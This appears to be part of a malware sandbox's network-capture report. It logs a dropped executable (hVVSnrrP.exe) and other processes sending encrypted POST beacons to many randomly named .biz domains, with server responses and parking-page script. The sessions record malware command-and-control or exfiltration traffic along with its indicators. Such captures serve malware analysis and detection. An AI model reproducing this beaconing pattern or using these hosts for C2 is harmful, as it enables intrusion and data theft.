                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946789026 CET1236INData Raw: 30 7a 51 6d 39 38 59 57 51 33 4d 32 45 35 4e 6a 64 69 4e 47 45 7a 4f 54 68 6c 4f 47 55 78 4e 32 59 30 4f 44 64 6b 4f 44 51 30 59 57 45 33 5a 54 55 35 59 54 4d 78 4e 44 46 6d 5a 58 77 77 66 44 42 38 66 44 42 38 66 48 77 77 66 44 42 38 56 7a 45 77
                                                                                                                                                                                                                                                                        Data Ascii: 0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHwwfDB8VzEwPXx8MXxXMTA9fDdlOWE2MmY2NDFjODgwZWQ3OWRkNTE2OTI4NzkyZjRjMzcwMzg3MzZ8MHxkcC10ZWFtaW50ZXJuZXQxMl8zcGh8MHwwfDE3NzkyNzU0NTh8fHw='; let domain='przvgke.biz';
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946826935 CET1236INData Raw: 61 6e 74 2c 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 3a 20 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 2c 74 65 72 6d 73 3a 20 70 61 67 65 4f 70 74 69 6f 6e 73 2e 74 65 72 6d 73 7d 3b 69 66 20 28 21 61 64 73 4c 6f 61 64 65 64 20 7c 7c 20 28
                                                                                                                                                                                                                                                                        Data Ascii: ant,callbackOptions: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeUR
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.951761007 CET1236INData Raw: 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 7d 7d 69 66 20 28 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63 6f 64 65 20 3d 3d 20 32 30 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 2f 2f 64
                                                                                                                                                                                                                                                                        Data Ascii: '//' + location.host;}}if (status.error_code == 20) {window.location.replace("//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? "" : "ca-") + pageOptions.pubid) + "&domain_


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        18192.168.2.224918218.141.10.10780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.157849073 CET349OUTPOST /mspai HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.157864094 CET784OUTData Raw: f4 83 9d 2e 4d 2b d2 49 04 03 00 00 20 80 9d e5 c6 ac 02 95 d5 0a 68 9c b1 f8 ee 61 f8 d5 bc 1e 87 7b 21 fd 68 74 8c 68 15 63 88 62 2f c1 fa 52 e6 ea 75 90 2b 92 1b 9b 47 32 a6 6c d7 38 f1 95 45 d7 2b 5b 8c d0 95 e7 b8 65 d6 6d b2 54 2f 11 31 88
                                                                                                                                                                                                                                                                        Data Ascii: .M+I ha{!hthcb/Ru+G2l8E+[emT/1\Kl1y75$8!+:X*MT?%kr juOGpW$[&kY|y5k`>o:/~7|Xrj_]:sy^vf.Xg
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.549118996 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=23e605ebba0bbcb99e40b336f860fd17|8.46.123.189|1736942271|1736942271|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        19192.168.2.224918382.112.184.19780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.660360098 CET343OUTPOST /m HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.660388947 CET784OUTData Raw: 10 7c ee 2a ad ac 85 28 04 03 00 00 07 b0 4e ac 56 21 ba 99 3a 29 6b 31 0c 0b 8c 28 d0 94 5a 82 46 4d 4a c5 ad b5 7e a6 39 9f 97 b2 ce 83 06 fa 47 e6 ed c5 91 78 46 6e 1e 63 19 a1 cc c2 74 f8 8e 81 48 47 92 2c 6c 27 d2 b5 3f 0f d8 14 dc b7 9f 59
                                                                                                                                                                                                                                                                        Data Ascii: |*(NV!:)k1(ZFMJ~9GxFnctHG,l'?YpAGW`AnMj#MT(fFea?Mxd=q%ifV$/}6ykr>;N(C\>rg~Lxx0^A=w kV,;G4<Cggj}q>..1


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        20192.168.2.224918482.112.184.197803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.764179945 CET352OUTPOST /savrhhv HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.764204979 CET850OUTData Raw: 46 6f 47 b2 cb e5 15 03 46 03 00 00 55 ef 0a 07 76 62 3c 84 33 1a 9f 76 ca d9 e9 21 c4 23 d5 45 00 6b 1b 3d 09 65 67 94 12 57 ec 1d 2b 2a fb 2c bd 7b 0d 2c a5 68 a0 4f db 60 83 b8 82 82 af a1 e7 ca f9 d4 c1 1e 39 0d 13 5e 36 13 ea 09 db 3a 52 15
                                                                                                                                                                                                                                                                        Data Ascii: FoGFUvb<3v!#Ek=egW+*,{,hO`9^6:R6ar@%v^Neqe!MT_mA?JAa?T,+yHkF G h`2o%\>LT.ju8,6'7;;$2G7SI:K<2


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        21192.168.2.224918582.112.184.19780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.169465065 CET349OUTPOST /tehaooq HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.169549942 CET784OUTData Raw: 16 0a 5c ca 82 c4 72 f7 04 03 00 00 f4 1e 63 00 3a b4 25 2d c6 3e f4 37 51 ca 64 84 39 79 4a 14 db fd fb 67 6c 4b a0 06 b7 cd 31 5e 0f fb b5 e4 79 c3 90 78 7f ae 68 e6 32 f9 60 60 6b 43 2e 5e cf 97 5b 8e 5e 44 a6 63 fd 47 d7 d5 09 f4 3d 0b bf 09
                                                                                                                                                                                                                                                                        Data Ascii: \rc:%->7Qd9yJglK1^yxh2``kC.^[^DcG=fCQ=GtD>TN-7^ij[`cqlem%#xwy4T_5fjeA2yt[; -:n%9"`kDb(C


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        22192.168.2.224918654.244.188.177801924C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.659689903 CET358OUTPOST /bqjjhsnkosjso HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 814
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.659710884 CET814OUTData Raw: 1c 87 cf cd 04 bf 9c 4a 22 03 00 00 9f 4d e7 ca 67 51 d0 74 41 62 77 22 e8 9c df d8 1b 74 5a 2f 84 04 3d a3 10 eb 17 cc 88 4b 95 ae 95 37 42 05 9f cf 0d 84 34 11 87 62 60 f5 5c 09 e8 3b 03 7e 9c c0 17 06 b5 9b be f1 05 7e 38 76 86 2c fe 26 43 5f
                                                                                                                                                                                                                                                                        Data Ascii: J"MgQtAbw"tZ/=K7B4b`\;~~8v,&C_##NFnBS}5?{ZVEyal1+0O> "~G-;0K-6uT7kr`].^_(./.#=)S^zjA
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:17.368026972 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:17 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=056c56bc68013df01ed6139e3797886b|8.46.123.189|1736942297|1736942297|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        23192.168.2.224918718.141.10.107801924C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.201039076 CET346OUTPOST /rgs HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 814
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.201057911 CET814OUTData Raw: 02 a1 9b 9e 74 41 1c 35 22 03 00 00 52 d3 77 25 41 46 68 38 12 db ea 91 46 fe 80 c9 e5 f8 b0 4c 72 a4 c4 68 c6 66 9c 6c fd fb a5 2b fc 85 e9 2d 18 ab 4d fe 77 83 f8 13 6a cd 22 8a f1 05 4d 8c a7 ef 6c ae b8 6b 5b 11 d1 93 05 28 1d 0a 13 f3 b1 0f
                                                                                                                                                                                                                                                                        Data Ascii: tA5"Rw%AFh8FLrhfl+-Mwj"Mlk[(z>"EWG3I.=kWX.PtfaN=ZYV.xkCQ1)i,OeU6]c8or;V(h?j8PS>=D9~DVT$/&t)0yZe|k@
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.575298071 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=364ff58318c1370c81c9ff9386c1ade7|8.46.123.189|1736942299|1736942299|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        24192.168.2.224918854.244.188.177801924C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.754714012 CET350OUTPOST /euichtddo HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 814
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.754714012 CET814OUTData Raw: b8 f1 ac 7a 86 af 3d a5 22 03 00 00 c9 46 4f b4 97 05 97 ba 1a b2 3d 4e 89 dd 31 6d 45 97 e1 4a e5 d1 ff ae 6b 7a 30 ed 11 51 83 07 5c ec 91 3a 11 7c 8f a7 b7 c4 b8 60 a8 2f f5 0d e5 e0 00 4c 56 44 cb ea ab ea a4 03 e2 d6 d3 de 5e 60 02 d0 3d ab
                                                                                                                                                                                                                                                                        Data Ascii: z="FO=N1mEJkz0Q\:|`/LVD^`=kQ9v#,9qJt}LEkwH}W~XO|fQ7]sV}P<{1u_;5h*0jEtML>-[xvj}6WxML]@T
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.475764990 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=6106efb722e6dc0a15e2000723f122e8|8.46.123.189|1736942300|1736942300|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        25192.168.2.224918944.221.84.105801924C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.578520060 CET346OUTPOST /ka HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 814
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.578520060 CET814OUTData Raw: 41 59 89 43 24 86 c1 9c 22 03 00 00 17 29 cb 05 31 59 a8 29 f1 5e ef b1 06 c9 7f 65 5c c9 b1 a5 d8 4d df 53 df 0a 36 28 43 68 18 26 4a de ba e9 45 74 a8 6b 56 c4 fb 6c 16 36 53 ec 1f 82 b5 89 ad e7 a9 fa 8a 92 a5 05 18 26 e0 c3 71 fe 4e 53 6f e7
                                                                                                                                                                                                                                                                        Data Ascii: AYC$")1Y)^e\MS6(Ch&JEtkVl6S&qNSo"j `jA?>gj`heSH2|_!\K(,(1a`x jM5WTdw$Fv3X#IQ2xzL|svuOcM]Iq\D5[
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.042254925 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=477df4442fdf54403d5db538be38fb69|8.46.123.189|1736942300|1736942300|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        26192.168.2.224919072.52.178.23801924C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.059031963 CET358OUTPOST /bhikwfegywkkepu HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 814
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.059042931 CET814OUTData Raw: 6e 8d fc f7 22 7f 3c 3b 22 03 00 00 2e 4d 80 05 62 dc 4b 1b 50 e3 cc 15 c5 f4 97 92 1b fd b6 21 ed 4d e3 5d 53 ae b6 dc b7 9f 83 67 11 3e af 9a ea 50 ad e8 70 a4 ff c2 3f b0 0b 06 fb db 64 c6 1b 5f 2b e3 01 a0 3e c1 c4 0b 48 79 ed 63 41 b5 9f bf
                                                                                                                                                                                                                                                                        Data Ascii: n"<;".MbKP!M]Sg>Pp?d_+>HycAys%OFq#)QmVe^]!wsbGD8"r4$2cAkSb)f7y]V"[F<jKt/y/-563vT
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.595531940 CET289INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.811856985 CET289INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.469999075 CET355OUTPOST /ayokafkcxduc HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 814
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.470000029 CET814OUTData Raw: 8b 9e 50 28 ca 93 9c 01 22 03 00 00 c2 a8 43 45 f1 9c c3 c1 b4 d1 94 b7 34 43 58 45 ca ed 09 9c e4 a4 34 3b e7 6d 41 5d de 88 76 8a 1c 97 6e 0d ce b0 f4 c1 c0 f1 54 d9 58 97 b5 90 21 64 8c 0a ee cb 63 48 35 e0 8a df 88 46 07 97 fe 7f 65 dd f8 d1
                                                                                                                                                                                                                                                                        Data Ascii: P("CE4CXE4;mA]vnTX!dcH5Feeaz*{:Lp|\27:PiGnRe\;`)] ?_G.LAi3#{r=!-_1h8DdEU8rJ7 ~z=!HAm.W8zL(W)d$w
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.613903046 CET287INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:22 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.827723980 CET287INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:22 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        27192.168.2.2249191199.59.243.228801924C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.005378962 CET365OUTGET /bhikwfegywkkepu?usid=20&utid=14164930459 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww7.przvgke.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.468952894 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        date: Wed, 15 Jan 2025 11:58:21 GMT
                                                                                                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        content-length: 1150
                                                                                                                                                                                                                                                                        x-request-id: f9aa2e87-9c3f-4b4e-aa95-83747034f078
                                                                                                                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZBYLw3HXC0CYGKlfqePfdks1jNtR6icVoQ1vaFhSz9FBBSTvIVyOjaOTblmA2ILD76OEoTqEmdkWtS+4oXHLQ==
                                                                                                                                                                                                                                                                        set-cookie: parking_session=f9aa2e87-9c3f-4b4e-aa95-83747034f078; expires=Wed, 15 Jan 2025 12:13:22 GMT; path=/
